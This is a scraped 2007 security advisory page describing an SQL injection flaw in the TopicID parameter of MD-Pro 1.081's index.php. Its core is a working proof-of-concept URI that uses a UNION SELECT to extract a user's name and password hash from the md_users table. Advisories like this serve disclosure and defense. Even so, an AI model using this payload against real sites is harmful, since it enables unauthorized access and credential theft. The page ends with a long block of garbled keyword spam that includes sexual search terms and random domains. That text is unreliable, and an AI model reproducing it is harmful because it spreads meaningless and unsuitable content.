about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , MD-Pro Index.PHP TopicID SQL Injection Vulnerability


Title MD-Pro Index.PHP TopicID SQL Injection Vulnerability
Published 2007-07-19-12:00AM
Updated 2007-07-23-10:16PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  The discoverer of this issue is currently unknown.
Vulnerable  MAXdev MDPro 1.081
Not Vulnerable  
Code  Attackers can exploit this issue via a browser.

The following URI is sufficient to demonstrate this issue:

http://www.example.com/[mdpro_path]/index.php?module=Topics&func=view&topicid=-1 UNION ALL SELECT null,null,concat(pn_uname,0x3a,pn_pass),null,null,null,null from md_users where pn_uid=2/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 05:44:39 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.ksdyz. TRISHA SEX naked aswa news for c Bandung Crack Data ip board 2 www.118114 07-035 Women.Com Seximovies hindisexst Linux 2.4 good site exploit Fr www.cqyuze Sexcy ram iwebwork.c news for c see movie. www.napo.g Tamil actr aflam sxs www.zhiyon hotsexfoto www sexmo news for C kan.gx7c.c passportde Counter tfi mambo Remo naked actr atplayer.c dmoz.im Apache/2.0 www.dgxycb www sexmo mambo Remo waptric thirasha] 2e99bb.2ec site kiosk Tapilan se Microsoft Virag sexysexyse Rex aiswaraya www.i360i.